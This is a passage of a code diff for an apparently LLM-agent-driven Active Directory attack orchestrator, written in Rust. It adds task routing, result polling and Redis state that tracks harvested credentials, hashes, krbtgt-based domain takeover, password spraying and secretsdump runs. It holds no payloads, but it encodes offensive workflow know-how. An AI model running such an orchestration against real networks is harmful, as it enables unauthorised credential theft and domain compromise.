unavailable for extended period, still retrying" + ); + } else { + warn!( + attempt = consecutive_failures, + err = %e, + delay_secs = delay.as_secs(), + "Result consumer: connection error, retrying" + ); + } + + tokio::select! { + _ = tokio::time::sleep(delay) => {}, + _ = shutdown.changed() => { + info!("Result consumer shutting down (signalled during backoff)"); + break; + } + } + continue; + } else { + warn!(err = %e, "Result consumer non-connection error"); + } + } + } + + // Normal pace — sleep between polls + tokio::select! { + _ = tokio::time::sleep(poll_interval) => {}, + _ = shutdown.changed() => { + info!("Result consumer shutting down (signalled during sleep)"); + break; + } + } + } + + info!("Result consumer stopped"); + }); + + (handle, rx) +} + +/// One polling cycle: check all tracked tasks for results. +async fn consume_cycle( + queue: &TaskQueue, + tracker: &ActiveTaskTracker, + tx: &mpsc::Sender, +) -> Result { + let task_ids = tracker.task_ids().await; + if task_ids.is_empty() { + return Ok(0); + } + + let results = queue + .check_results_batch(&task_ids) + .await + .inspect_err(|e| warn!(tracked = task_ids.len(), err = %e, "check_results_batch failed"))?; + + let mut found = 0_usize; + for (task_id, maybe_result) in results { + if let Some(result) = maybe_result { + // Remove from tracker + tracker.remove(&task_id).await; + + // Send to main loop + let completed = CompletedTask { + task_id: task_id.clone(), + result, + }; + if tx.send(completed).await.is_err() { + // Main loop dropped the receiver — shutting down + info!("Result channel closed, stopping consumer"); + break; + } + found += 1; + } + } + + Ok(found) +} + +/// Heuristic to identify Redis connection errors. +fn is_connection_error(e: &anyhow::Error) -> bool { + let msg = e.to_string().to_lowercase(); + [ + "connection", + "connect", + "closed", + "timeout", + "broken pipe", + "reset", + "refused", + "sentinel", + ] + .iter() + .any(|kw| msg.contains(kw)) +} diff --git a/ares-cli/src/orchestrator/routing.rs b/ares-cli/src/orchestrator/routing.rs new file mode 100644 index 00000000..5291fa62 --- /dev/null +++ b/ares-cli/src/orchestrator/routing.rs @@ -0,0 +1,258 @@ +//! Task routing — decides which agent queue receives a task. +//! +//! Mirrors the Python `ares.core.dispatcher.routing.RoutingMixin` logic: +//! route by role, respect per-role concurrency limits, track active tasks. + +use std::collections::HashMap; +use std::sync::Arc; + +use tokio::sync::Mutex; + +// --------------------------------------------------------------------------- +// Active-task tracker (shared across routing + monitoring + throttling) +// --------------------------------------------------------------------------- + +/// Per-role tracking of in-flight tasks. +#[derive(Debug, Clone)] +pub struct ActiveTask { + pub task_id: String, + pub task_type: String, + pub role: String, + pub submitted_at: std::time::Instant, +} + +/// Thread-safe tracker for all in-flight tasks. +#[derive(Debug, Clone)] +pub struct ActiveTaskTracker { + inner: Arc>, +} + +#[derive(Debug, Default)] +struct TrackerInner { + /// task_id -> ActiveTask + tasks: HashMap, + /// role -> count of active tasks + role_counts: HashMap, +} + +impl Default for ActiveTaskTracker { + fn default() -> Self { + Self::new() + } +} + +impl ActiveTaskTracker { + pub fn new() -> Self { + Self { + inner: Arc::new(Mutex::new(TrackerInner::default())), + } + } + + /// Register a newly submitted task. + pub async fn add(&self, task: ActiveTask) { + let mut inner = self.inner.lock().await; + *inner.role_counts.entry(task.role.clone()).or_insert(0) += 1; + inner.tasks.insert(task.task_id.clone(), task); + } + + /// Remove a completed/failed task. Returns the task if it was tracked. + pub async fn remove(&self, task_id: &str) -> Option { + let mut inner = self.inner.lock().await; + if let Some(task) = inner.tasks.remove(task_id) { + if let Some(count) = inner.role_counts.get_mut(&task.role) { + *count = count.saturating_sub(1); + } + Some(task) + } else { + None + } + } + + /// Number of active tasks for a role. + pub async fn count_for_role(&self, role: &str) -> usize { + let inner = self.inner.lock().await; + inner.role_counts.get(role).copied().unwrap_or(0) + } + + /// Total number of active LLM-consuming tasks (excludes `crack`, `command`). + pub async fn llm_task_count(&self) -> usize { + let inner = self.inner.lock().await; + inner + .tasks + .values() + .filter(|t| !is_non_llm_task(&t.task_type)) + .count() + } + + /// Total active tasks across all roles. + #[allow(dead_code)] + pub async fn total(&self) -> usize { + let inner = self.inner.lock().await; + inner.tasks.len() + } + + /// Get all tracked task IDs (for result polling). + pub async fn task_ids(&self) -> Vec { + let inner = self.inner.lock().await; + inner.tasks.keys().cloned().collect() + } + + /// Get tasks older than `age` that have not received a result. + pub async fn stale_tasks(&self, max_age: std::time::Duration) -> Vec { + let inner = self.inner.lock().await; + let cutoff = std::time::Instant::now() - max_age; + inner + .tasks + .values() + .filter(|t| t.submitted_at < cutoff) + .cloned() + .collect() + } +} + +/// Task types that do not consume LLM tokens. +const NON_LLM_TYPES: &[&str] = &["crack", "command"]; + +pub fn is_non_llm_task(task_type: &str) -> bool { + NON_LLM_TYPES.contains(&task_type) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn non_llm_task_classification() { + assert!(is_non_llm_task("crack")); + assert!(is_non_llm_task("command")); + assert!(!is_non_llm_task("recon")); + assert!(!is_non_llm_task("exploit")); + assert!(!is_non_llm_task("privesc_enumeration")); + assert!(!is_non_llm_task("")); + } + + #[tokio::test] + async fn tracker_add_remove() { + let tracker = ActiveTaskTracker::new(); + assert_eq!(tracker.total().await, 0); + + tracker + .add(ActiveTask { + task_id: "t1".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + + assert_eq!(tracker.total().await, 1); + assert_eq!(tracker.count_for_role("recon").await, 1); + assert_eq!(tracker.count_for_role("lateral").await, 0); + + let removed = tracker.remove("t1").await; + assert!(removed.is_some()); + assert_eq!(tracker.total().await, 0); + assert_eq!(tracker.count_for_role("recon").await, 0); + } + + #[tokio::test] + async fn tracker_remove_nonexistent() { + let tracker = ActiveTaskTracker::new(); + assert!(tracker.remove("nonexistent").await.is_none()); + } + + #[tokio::test] + async fn llm_count_excludes_non_llm() { + let tracker = ActiveTaskTracker::new(); + + for (id, task_type, role) in [ + ("t1", "recon", "recon"), + ("t2", "crack", "cracker"), + ("t3", "command", "lateral"), + ("t4", "exploit", "privesc"), + ] { + tracker + .add(ActiveTask { + task_id: id.into(), + task_type: task_type.into(), + role: role.into(), + submitted_at: std::time::Instant::now(), + }) + .await; + } + + assert_eq!(tracker.total().await, 4); + assert_eq!(tracker.llm_task_count().await, 2); // recon + exploit + } + + #[tokio::test] + async fn stale_tasks_detection() { + let tracker = ActiveTaskTracker::new(); + + tracker + .add(ActiveTask { + task_id: "old".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now() - std::time::Duration::from_secs(120), + }) + .await; + + tracker + .add(ActiveTask { + task_id: "new".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + + let stale = tracker + .stale_tasks(std::time::Duration::from_secs(60)) + .await; + assert_eq!(stale.len(), 1); + assert_eq!(stale[0].task_id, "old"); + } + + #[tokio::test] + async fn task_ids_collected() { + let tracker = ActiveTaskTracker::new(); + tracker + .add(ActiveTask { + task_id: "a".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + tracker + .add(ActiveTask { + task_id: "b".into(), + task_type: "exploit".into(), + role: "privesc".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + + let mut ids = tracker.task_ids().await; + ids.sort(); + assert_eq!(ids, vec!["a", "b"]); + } + + #[tokio::test] + async fn role_count_saturating_sub() { + let tracker = ActiveTaskTracker::new(); + // Double-remove shouldn't panic or underflow + tracker + .add(ActiveTask { + task_id: "t1".into(), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: std::time::Instant::now(), + }) + .await; + tracker.remove("t1").await; + tracker.remove("t1").await; // second remove returns None + assert_eq!(tracker.count_for_role("recon").await, 0); + } +} diff --git a/ares-cli/src/orchestrator/state/dedup.rs b/ares-cli/src/orchestrator/state/dedup.rs new file mode 100644 index 00000000..e49bf913 --- /dev/null +++ b/ares-cli/src/orchestrator/state/dedup.rs @@ -0,0 +1,69 @@ +//! Dedup persistence — mark_exploited, persist_dedup, persist_mssql. + +use anyhow::Result; +use redis::AsyncCommands; + +use ares_core::state; + +use super::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Mark a vulnerability as exploited. + pub async fn mark_exploited(&self, queue: &TaskQueue, vuln_id: &str) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_EXPLOITED + ); + let mut conn = queue.connection(); + let _: () = conn.sadd(&key, vuln_id).await?; + let _: () = conn.expire(&key, 86400).await?; + + let mut state = self.inner.write().await; + state.exploited_vulnerabilities.insert(vuln_id.to_string()); + Ok(()) + } + + /// Persist a dedup set entry to Redis. + pub async fn persist_dedup(&self, queue: &TaskQueue, set_name: &str, key: &str) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + set_name + ); + let mut conn = queue.connection(); + let _: () = conn.sadd(&redis_key, key).await?; + let _: () = conn.expire(&redis_key, 86400).await?; + Ok(()) + } + + /// Persist MSSQL enum dispatched entry to Redis. + pub async fn persist_mssql_dispatched(&self, queue: &TaskQueue, ip: &str) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let redis_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_MSSQL_ENUM_DISPATCHED + ); + let mut conn = queue.connection(); + let _: () = conn.sadd(&redis_key, ip).await?; + let _: () = conn.expire(&redis_key, 86400).await?; + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/state/inner.rs b/ares-cli/src/orchestrator/state/inner.rs new file mode 100644 index 00000000..738cf819 --- /dev/null +++ b/ares-cli/src/orchestrator/state/inner.rs @@ -0,0 +1,377 @@ +//! StateInner — the actual mutable state backing SharedState. + +use std::collections::{HashMap, HashSet}; + +use chrono::{DateTime, Utc}; + +use ares_core::models::*; + +use super::ALL_DEDUP_SETS; + +/// Lockout quarantine duration: 5 minutes matches S4U cooldown and typical +/// AD lockout observation windows. Longer values block the critical path. +const QUARANTINE_DURATION_SECS: i64 = 300; + +#[derive(Debug)] +pub struct StateInner { + pub operation_id: String, + pub target: Option, + pub target_ips: Vec, + + // Collections (append-mostly) + pub credentials: Vec, + pub hashes: Vec, + pub hosts: Vec, + pub users: Vec, + pub shares: Vec, + pub domains: Vec, + + // Vulnerability tracking + pub discovered_vulnerabilities: HashMap, + pub exploited_vulnerabilities: HashSet, + + // Maps + pub domain_controllers: HashMap, + pub netbios_to_fqdn: HashMap, + pub domain_sids: HashMap, + /// RID-500 account name per domain (may differ from "Administrator" if renamed). + pub admin_names: HashMap, + + // Trust relationships (domain FQDN → trust metadata) + pub trusted_domains: HashMap, + + // Per-domain DA tracking: domains where krbtgt NTLM has been obtained + pub dominated_domains: HashSet, + + // Flags + pub has_domain_admin: bool, + pub has_golden_ticket: bool, + pub domain_admin_path: Option, + + // Dedup sets (persisted to Redis) + pub dedup: HashMap>, + + // MSSQL enum tracking (persisted to Redis SET) + pub mssql_enum_dispatched: HashSet, + + // ACL chain data (from BloodHound, stored in Redis LIST) + pub acl_chains: Vec, + + // ACL step dedup (tracks which chain steps have been dispatched) + pub dispatched_acl_steps: HashSet, + + // Pending/completed tasks (in-memory only) + pub pending_tasks: HashMap, + pub completed_tasks: HashMap, + + // Credential lockout quarantine: `user@domain` → expiry time. + // Credentials that triggered STATUS_ACCOUNT_LOCKED_OUT or + // KDC_ERR_CLIENT_REVOKED are quarantined to avoid burning auth budget. + pub quarantined_credentials: HashMap>, + + // Completion flag (set externally to signal operation should wrap up) + pub completed: bool, +} + +impl StateInner { + pub(super) fn new(operation_id: String) -> Self { + let mut dedup = HashMap::new(); + for name in ALL_DEDUP_SETS { + dedup.insert(name.to_string(), HashSet::new()); + } + + Self { + operation_id, + target: None, + target_ips: Vec::new(), + credentials: Vec::new(), + hashes: Vec::new(), + hosts: Vec::new(), + users: Vec::new(), + shares: Vec::new(), + domains: Vec::new(), + discovered_vulnerabilities: HashMap::new(), + exploited_vulnerabilities: HashSet::new(), + domain_controllers: HashMap::new(), + netbios_to_fqdn: HashMap::new(), + domain_sids: HashMap::new(), + admin_names: HashMap::new(), + trusted_domains: HashMap::new(), + dominated_domains: HashSet::new(), + has_domain_admin: false, + has_golden_ticket: false, + domain_admin_path: None, + dedup, + mssql_enum_dispatched: HashSet::new(), + acl_chains: Vec::new(), + dispatched_acl_steps: HashSet::new(), + pending_tasks: HashMap::new(), + completed_tasks: HashMap::new(), + quarantined_credentials: HashMap::new(), + completed: false, + } + } + + /// Check if a username is the delegating account for a constrained + /// delegation or RBCD vulnerability. These accounts must be reserved + /// for S4U exploitation — spraying or secretsdump with their creds + /// causes lockout before S4U can use them. + pub fn is_delegation_account(&self, username: &str) -> bool { + let u = username.to_lowercase(); + self.discovered_vulnerabilities.values().any(|vuln| { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "constrained_delegation" && vtype != "rbcd" { + return false; + } + vuln.details + .get("account_name") + .or_else(|| vuln.details.get("AccountName")) + .and_then(|v| v.as_str()) + .map(|a| a.to_lowercase() == u) + .unwrap_or(false) + }) + } + + /// Check if a credential is quarantined due to lockout. + /// Expired quarantines are ignored (lazy cleanup). + pub fn is_credential_quarantined(&self, username: &str, domain: &str) -> bool { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + self.quarantined_credentials + .get(&key) + .map(|expiry| Utc::now() < *expiry) + .unwrap_or(false) + } + + /// Quarantine a credential for `QUARANTINE_DURATION_SECS` after lockout. + pub fn quarantine_credential(&mut self, username: &str, domain: &str) { + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + let expiry = Utc::now() + chrono::Duration::seconds(QUARANTINE_DURATION_SECS); + self.quarantined_credentials.insert(key, expiry); + } + + /// Check if a dedup key exists in the named set. + pub fn is_processed(&self, set_name: &str, key: &str) -> bool { + self.dedup + .get(set_name) + .map(|s| s.contains(key)) + .unwrap_or(false) + } + + /// Check if any key in the named dedup set starts with `prefix`. + pub fn has_processed_prefix(&self, set_name: &str, prefix: &str) -> bool { + self.dedup + .get(set_name) + .map(|s| s.iter().any(|k| k.starts_with(prefix))) + .unwrap_or(false) + } + + /// Mark a key as processed in the named set. + pub fn mark_processed(&mut self, set_name: &str, key: String) { + self.dedup + .entry(set_name.to_string()) + .or_default() + .insert(key); + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::*; + + #[test] + fn test_state_inner_new_initializes_all_dedup_sets() { + let state = StateInner::new("op-test".into()); + assert_eq!(state.operation_id, "op-test"); + assert!(!state.has_domain_admin); + assert!(!state.has_golden_ticket); + assert!(!state.completed); + + // All 19 dedup sets should be initialized + for name in ALL_DEDUP_SETS { + assert!(state.dedup.contains_key(*name), "Missing dedup set: {name}"); + assert!(state.dedup[*name].is_empty()); + } + assert_eq!(state.dedup.len(), ALL_DEDUP_SETS.len()); + } + + #[test] + fn test_is_processed_returns_false_for_unknown_set() { + let state = StateInner::new("op-1".into()); + assert!(!state.is_processed("nonexistent_set", "key1")); + } + + #[test] + fn test_mark_processed_and_is_processed() { + let mut state = StateInner::new("op-1".into()); + assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); + + state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); + assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); + assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash2")); + } + + #[test] + fn test_mark_processed_creates_new_set_if_needed() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed("custom_set", "key1".into()); + assert!(state.is_processed("custom_set", "key1")); + } + + #[test] + fn test_mark_processed_idempotent() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); + assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1); + } + + #[test] + fn test_dedup_sets_are_independent() { + let mut state = StateInner::new("op-1".into()); + state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); + + assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); + assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "192.168.58.10")); + assert!(state.is_processed(DEDUP_SECRETSDUMP, "192.168.58.10")); + assert!(!state.is_processed(DEDUP_SECRETSDUMP, "hash1")); + } + + #[test] + fn test_exploited_vulnerabilities_tracking() { + let mut state = StateInner::new("op-1".into()); + assert!(state.exploited_vulnerabilities.is_empty()); + + state + .exploited_vulnerabilities + .insert("vuln-001".to_string()); + assert!(state.exploited_vulnerabilities.contains("vuln-001")); + assert!(!state.exploited_vulnerabilities.contains("vuln-002")); + } + + #[test] + fn test_mssql_enum_dispatched_tracking() { + let mut state = StateInner::new("op-1".into()); + assert!(!state.mssql_enum_dispatched.contains("192.168.58.20")); + + state + .mssql_enum_dispatched + .insert("192.168.58.20".to_string()); + assert!(state.mssql_enum_dispatched.contains("192.168.58.20")); + } + + #[test] + fn test_domain_controller_map() { + let mut state = StateInner::new("op-1".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + + assert_eq!( + state.domain_controllers.get("contoso.local"), + Some(&"192.168.58.10".to_string()) + ); + assert_eq!( + state.domain_controllers.get("fabrikam.local"), + Some(&"192.168.58.20".to_string()) + ); + assert_eq!(state.domain_controllers.get("unknown.local"), None); + } + + #[test] + fn test_all_known_dedup_set_constants() { + // Verify constants are accessible and match expected names + let expected = vec![ + DEDUP_CRACK_REQUESTS, + DEDUP_SECRETSDUMP, + DEDUP_DELEGATION_CREDS, + DEDUP_ADCS_SERVERS, + DEDUP_BLOODHOUND_DOMAINS, + DEDUP_SPIDERED_SHARES, + DEDUP_EXPANSION_CREDS, + DEDUP_ASREP_DOMAINS, + DEDUP_USERNAME_SPRAY, + DEDUP_PASSWORD_SPRAY, + DEDUP_ESC8_SERVERS, + DEDUP_COERCED_DCS, + DEDUP_WRITABLE_SHARES, + DEDUP_HASH_LATERAL, + DEDUP_SCANNED_TARGETS, + DEDUP_ACL_STEPS, + DEDUP_TRUST_FOLLOW, + DEDUP_S4U_EXPLOITS, + DEDUP_GMSA_ACCOUNTS, + DEDUP_LOW_HANGING, + DEDUP_CRED_SECRETSDUMP, + DEDUP_SHARE_ENUM, + ]; + assert_eq!(expected.len(), ALL_DEDUP_SETS.len()); + for name in expected { + assert!( + ALL_DEDUP_SETS.contains(&name), + "Missing from ALL_DEDUP_SETS: {name}" + ); + } + } + + #[test] + fn test_is_delegation_account() { + let mut state = StateInner::new("op-1".into()); + assert!(!state.is_delegation_account("john.smith")); + + // Add a constrained delegation vuln for john.smith + let mut details = std::collections::HashMap::new(); + details.insert("account_name".to_string(), serde_json::json!("john.smith")); + state.discovered_vulnerabilities.insert( + "constrained_delegation_john.smith".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "constrained_delegation_john.smith".into(), + vuln_type: "constrained_delegation".into(), + target: "".into(), + discovered_by: "".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: "".into(), + priority: 8, + }, + ); + + assert!(state.is_delegation_account("john.smith")); + assert!(state.is_delegation_account("John.Smith")); // case insensitive + assert!(!state.is_delegation_account("sam.wilson")); + } + + #[test] + fn test_credential_quarantine() { + let mut state = StateInner::new("op-1".into()); + + // Not quarantined initially + assert!(!state.is_credential_quarantined("jdoe", "child.contoso.local")); + + // Quarantine a credential + state.quarantine_credential("jdoe", "child.contoso.local"); + assert!(state.is_credential_quarantined("jdoe", "child.contoso.local")); + assert!(state.is_credential_quarantined("JDOE", "CHILD.CONTOSO.LOCAL")); // case insensitive + + // Different credential not affected + assert!(!state.is_credential_quarantined("john.smith", "child.contoso.local")); + } + + #[test] + fn test_credential_quarantine_expired() { + let mut state = StateInner::new("op-1".into()); + + // Insert with an already-expired time + let key = "jdoe@child.contoso.local".to_string(); + state + .quarantined_credentials + .insert(key, Utc::now() - chrono::Duration::seconds(1)); + + // Should not be quarantined (expired) + assert!(!state.is_credential_quarantined("jdoe", "child.contoso.local")); + } +} diff --git a/ares-cli/src/orchestrator/state/mod.rs b/ares-cli/src/orchestrator/state/mod.rs new file mode 100644 index 00000000..1fedb6bc --- /dev/null +++ b/ares-cli/src/orchestrator/state/mod.rs @@ -0,0 +1,75 @@ +//! In-memory shared state synced with Redis. +//! +//! `SharedState` wraps the operation state in `Arc>` so that all +//! background automation tasks can read state concurrently, and writes +//! (credential publishing, result processing) are serialized. +//! +//! State is loaded from Redis at startup and updated incrementally as results +//! arrive. Dedup sets are persisted to Redis so they survive orchestrator restarts. + +mod dedup; +mod inner; +mod persistence; +mod publishing; +mod shared; + +// Re-export everything that was publicly visible from the old single file. +pub use shared::SharedState; + +// --------------------------------------------------------------------------- +// Dedup set names (match Python `ares:op:{op_id}:dedup:{name}`) +// --------------------------------------------------------------------------- + +pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests"; +pub const DEDUP_SECRETSDUMP: &str = "secretsdump"; +pub const DEDUP_DELEGATION_CREDS: &str = "delegation_creds"; +pub const DEDUP_ADCS_SERVERS: &str = "adcs_servers"; +pub const DEDUP_BLOODHOUND_DOMAINS: &str = "bloodhound_domains"; +pub const DEDUP_SPIDERED_SHARES: &str = "spidered_shares"; +pub const DEDUP_EXPANSION_CREDS: &str = "expansion_creds"; +pub const DEDUP_ASREP_DOMAINS: &str = "asrep_domains"; +pub const DEDUP_USERNAME_SPRAY: &str = "username_spray"; +pub const DEDUP_PASSWORD_SPRAY: &str = "password_spray"; +pub const DEDUP_ESC8_SERVERS: &str = "esc8_servers"; +pub const DEDUP_COERCED_DCS: &str = "coerced_dcs"; +pub const DEDUP_WRITABLE_SHARES: &str = "writable_shares"; +pub const DEDUP_HASH_LATERAL: &str = "hash_lateral"; +pub const DEDUP_SCANNED_TARGETS: &str = "scanned_targets"; +pub const DEDUP_ACL_STEPS: &str = "acl_steps"; +pub const DEDUP_TRUST_FOLLOW: &str = "trust_follow"; +pub const DEDUP_S4U_EXPLOITS: &str = "s4u_exploits"; +pub const DEDUP_GMSA_ACCOUNTS: &str = "gmsa_accounts"; +pub const DEDUP_LOW_HANGING: &str = "low_hanging"; +pub const DEDUP_CRED_SECRETSDUMP: &str = "cred_secretsdump"; +pub const DEDUP_SHARE_ENUM: &str = "share_enum"; + +/// Vuln queue ZSET key suffix. +pub const KEY_VULN_QUEUE: &str = "vuln_queue"; + +/// Discovery list key prefix (NOT under ares:op:). +pub const DISCOVERY_KEY_PREFIX: &str = "ares:discoveries"; + +const ALL_DEDUP_SETS: &[&str] = &[ + DEDUP_CRACK_REQUESTS, + DEDUP_SECRETSDUMP, + DEDUP_DELEGATION_CREDS, + DEDUP_ADCS_SERVERS, + DEDUP_BLOODHOUND_DOMAINS, + DEDUP_SPIDERED_SHARES, + DEDUP_EXPANSION_CREDS, + DEDUP_ASREP_DOMAINS, + DEDUP_USERNAME_SPRAY, + DEDUP_PASSWORD_SPRAY, + DEDUP_ESC8_SERVERS, + DEDUP_COERCED_DCS, + DEDUP_WRITABLE_SHARES, + DEDUP_HASH_LATERAL, + DEDUP_SCANNED_TARGETS, + DEDUP_ACL_STEPS, + DEDUP_TRUST_FOLLOW, + DEDUP_S4U_EXPLOITS, + DEDUP_SHARE_ENUM, + DEDUP_GMSA_ACCOUNTS, + DEDUP_LOW_HANGING, + DEDUP_CRED_SECRETSDUMP, +]; diff --git a/ares-cli/src/orchestrator/state/persistence.rs b/ares-cli/src/orchestrator/state/persistence.rs new file mode 100644 index 00000000..8402822d --- /dev/null +++ b/ares-cli/src/orchestrator/state/persistence.rs @@ -0,0 +1,330 @@ +//! Redis persistence — load_from_redis & refresh_from_redis. + +use std::collections::{HashMap, HashSet}; + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tracing::{debug, info}; + +use ares_core::state::{self, RedisStateReader}; + +use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS}; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Load state from Redis (called at startup). + pub async fn load_from_redis(&self, queue: &TaskQueue) -> Result<()> { + let mut conn = queue.connection(); + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + + let reader = RedisStateReader::new(operation_id.clone()); + + // Load collections + let loaded = reader + .load_state(&mut conn) + .await + .context("Failed to load state from Redis")?; + + let loaded = match loaded { + Some(s) => s, + None => { + info!(operation_id = %operation_id, "No existing state in Redis — starting fresh"); + return Ok(()); + } + }; + + // Load dedup sets + let mut dedup_sets: HashMap> = HashMap::new(); + for set_name in ALL_DEDUP_SETS { + let key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + set_name + ); + let members: HashSet = conn.smembers(&key).await.unwrap_or_default(); + if !members.is_empty() { + debug!(set = set_name, count = members.len(), "Loaded dedup set"); + } + dedup_sets.insert(set_name.to_string(), members); + } + + // Load MSSQL enum dispatched + let mssql_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_MSSQL_ENUM_DISPATCHED + ); + let mssql_dispatched: HashSet = conn.smembers(&mssql_key).await.unwrap_or_default(); + + // Load domain SIDs + let domain_sids_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMAIN_SIDS + ); + let domain_sids: HashMap = + conn.hgetall(&domain_sids_key).await.unwrap_or_default(); + + // Load RID-500 admin account names + let admin_names_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ADMIN_NAMES + ); + let admin_names: HashMap = + conn.hgetall(&admin_names_key).await.unwrap_or_default(); + + // Load trusted domains + let trusted_domains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_TRUSTED_DOMAINS + ); + let raw_trusts: HashMap = + conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); + let mut trusted_domains = HashMap::new(); + for (domain, json_str) in &raw_trusts { + if let Ok(trust) = serde_json::from_str::(json_str) { + trusted_domains.insert(domain.clone(), trust); + } + } + + // Load ACL chains + let acl_chains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ACL_CHAINS + ); + let acl_chains_raw: Vec = conn + .lrange(&acl_chains_key, 0, -1) + .await + .unwrap_or_default(); + let acl_chains: Vec = acl_chains_raw + .iter() + .filter_map(|s| serde_json::from_str(s).ok()) + .collect(); + + // Load pending tasks from Redis HASH + let pending_tasks_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_PENDING_TASKS + ); + let raw_pending: std::collections::HashMap = + conn.hgetall(&pending_tasks_key).await.unwrap_or_default(); + let mut pending_tasks = std::collections::HashMap::new(); + for (task_id, json_str) in &raw_pending { + if let Ok(task_info) = serde_json::from_str::(json_str) { + pending_tasks.insert(task_id.clone(), task_info); + } + } + + // Load completed tasks from Redis HASH + let completed_tasks_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_COMPLETED_TASKS + ); + let raw_completed: std::collections::HashMap = + conn.hgetall(&completed_tasks_key).await.unwrap_or_default(); + let mut completed_tasks = std::collections::HashMap::new(); + for (task_id, json_str) in &raw_completed { + if let Ok(task_result) = serde_json::from_str::(json_str) + { + completed_tasks.insert(task_id.clone(), task_result); + } + } + + // Load dispatched ACL steps from dedup set + let acl_dedup_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + DEDUP_ACL_STEPS + ); + let dispatched_acl_steps: HashSet = + conn.smembers(&acl_dedup_key).await.unwrap_or_default(); + + // Apply to state + let mut state = self.inner.write().await; + state.target = loaded.target; + state.target_ips = loaded.target_ips; + state.credentials = loaded.all_credentials; + state.hashes = loaded.all_hashes; + state.hosts = loaded.all_hosts; + state.users = loaded.all_users; + state.shares = loaded.all_shares; + state.domains = loaded.all_domains; + state.discovered_vulnerabilities = loaded.discovered_vulnerabilities; + state.exploited_vulnerabilities = loaded.exploited_vulnerabilities; + state.domain_controllers = loaded.domain_controllers; + state.netbios_to_fqdn = loaded.netbios_to_fqdn; + state.domain_sids = domain_sids; + state.admin_names = admin_names; + state.trusted_domains = trusted_domains; + // Rebuild dominated_domains from krbtgt hashes + state.dominated_domains = state + .hashes + .iter() + .filter(|h| { + h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") + }) + .map(|h| { + if h.domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + h.domain.to_lowercase() + } + }) + .filter(|d| !d.is_empty()) + .collect(); + state.has_domain_admin = loaded.has_domain_admin; + state.has_golden_ticket = loaded.has_golden_ticket; + state.domain_admin_path = loaded.domain_admin_path; + state.dedup = dedup_sets; + state.mssql_enum_dispatched = mssql_dispatched; + state.acl_chains = acl_chains; + state.dispatched_acl_steps = dispatched_acl_steps; + state.pending_tasks = pending_tasks; + state.completed_tasks = completed_tasks; + + let cred_count = state.credentials.len(); + let hash_count = state.hashes.len(); + let host_count = state.hosts.len(); + let vuln_count = state.discovered_vulnerabilities.len(); + drop(state); + + info!( + operation_id = %operation_id, + credentials = cred_count, + hashes = hash_count, + hosts = host_count, + vulnerabilities = vuln_count, + "State loaded from Redis" + ); + + Ok(()) + } + + /// Refresh state from Redis (periodic sync). + pub async fn refresh_from_redis(&self, queue: &TaskQueue) -> Result<()> { + let mut conn = queue.connection(); + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id.clone()); + + let 